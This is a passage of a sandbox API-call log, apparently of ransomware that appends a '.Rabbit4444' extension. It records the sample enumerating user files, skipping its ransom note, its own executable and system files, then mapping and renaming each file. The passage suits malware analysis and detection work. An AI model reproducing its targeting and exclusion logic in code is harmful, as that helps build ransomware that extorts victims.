(lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="boot") returned 1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.156] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms" | out: lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms") returned="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms" [0059.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.156] lstrlenW (lpString="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms") returned 64 [0059.156] lstrlenW (lpString="Rabbit4444") returned 10 [0059.156] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.156] lstrlenW (lpString=".dll") returned 4 [0059.156] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.156] lstrlenW (lpString=".lnk") returned 4 [0059.156] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.156] lstrlenW (lpString=".ini") returned 4 [0059.156] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.156] lstrlenW (lpString=".sys") returned 4 [0059.157] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.157] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.157] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.157] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15046761076) returned 1 [0059.157] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=848) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.157] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0059.160] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0059.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.162] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.162] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.162] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.162] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15047255419) returned 1 [0059.162] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.162] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.162] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.162] CloseHandle (hObject=0x298) returned 1 [0059.162] CloseHandle (hObject=0x278) returned 1 [0059.162] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms.Rabbit4444") returned 192 [0059.162] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.163] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53878398, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53878398, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", cAlternateFileName="CL83E9~1.SET")) returned 1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2=".") returned 1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="..") returned 1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="windows") returned -1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="boot") returned 1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.163] lstrcmpiW (lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.163] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms" | out: lpString1="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms") returned="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms" [0059.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.164] lstrlenW (lpString="Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms") returned 64 [0059.164] lstrlenW (lpString="Rabbit4444") returned 10 [0059.164] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.164] lstrlenW (lpString=".dll") returned 4 [0059.164] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.164] lstrlenW (lpString=".lnk") returned 4 [0059.164] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.164] lstrlenW (lpString=".ini") returned 4 [0059.164] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.164] lstrlenW (lpString=".sys") returned 4 [0059.164] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{906435ec-336d-4b77-bcd6-397de8318852}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.164] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.164] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15047505410) returned 1 [0059.164] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1068) returned 1 [0059.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0059.164] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.166] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.167] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15047770635) returned 1 [0059.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0059.167] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.167] CloseHandle (hObject=0x298) returned 1 [0059.167] CloseHandle (hObject=0x278) returned 1 [0059.167] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms.Rabbit4444") returned 192 [0059.167] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{906435ec-336d-4b77-bcd6-397de8318852}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{906435ec-336d-4b77-bcd6-397de8318852}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.168] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53910cc6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53910cc6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", cAlternateFileName="CLF918~1.SET")) returned 1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2=".") returned 1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="..") returned 1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="windows") returned -1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="boot") returned 1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.168] lstrcmpiW (lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.168] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms" | out: lpString1="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms") returned="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms" [0059.168] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.169] lstrlenW (lpString="Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms") returned 64 [0059.169] lstrlenW (lpString="Rabbit4444") returned 10 [0059.169] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.169] lstrlenW (lpString=".dll") returned 4 [0059.169] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.169] lstrlenW (lpString=".lnk") returned 4 [0059.169] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.169] lstrlenW (lpString=".ini") returned 4 [0059.169] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.169] lstrlenW (lpString=".sys") returned 4 [0059.169] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{907f262a-012a-4f6a-94c9-f479f3e6ee16}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.169] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.169] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15048026557) returned 1 [0059.170] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1130) returned 1 [0059.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0059.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0059.170] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0059.171] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0059.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.172] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15048284470) returned 1 [0059.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0059.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0059.172] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.172] CloseHandle (hObject=0x298) returned 1 [0059.172] CloseHandle (hObject=0x278) returned 1 [0059.172] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms.Rabbit4444") returned 192 [0059.172] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{907f262a-012a-4f6a-94c9-f479f3e6ee16}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{907f262a-012a-4f6a-94c9-f479f3e6ee16}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.173] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x539a962e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x539a962e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23137ab2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", cAlternateFileName="CL8CC2~1.SET")) returned 1 [0059.173] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.173] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.173] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.173] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2=".") returned 1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="..") returned 1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="windows") returned -1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="boot") returned 1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.174] lstrcmpiW (lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.174] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms" | out: lpString1="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms") returned="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms" [0059.174] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.174] lstrlenW (lpString="Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms") returned 64 [0059.174] lstrlenW (lpString="Rabbit4444") returned 10 [0059.174] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.174] lstrlenW (lpString=".dll") returned 4 [0059.174] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.174] lstrlenW (lpString=".lnk") returned 4 [0059.174] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.174] lstrlenW (lpString=".ini") returned 4 [0059.174] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.174] lstrlenW (lpString=".sys") returned 4 [0059.174] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.175] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.175] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15048539338) returned 1 [0059.175] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=938) returned 1 [0059.175] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.175] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0059.175] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.176] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.177] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.177] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.177] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.177] RtlAllocateHeap (HeapHandle=0xe0000, 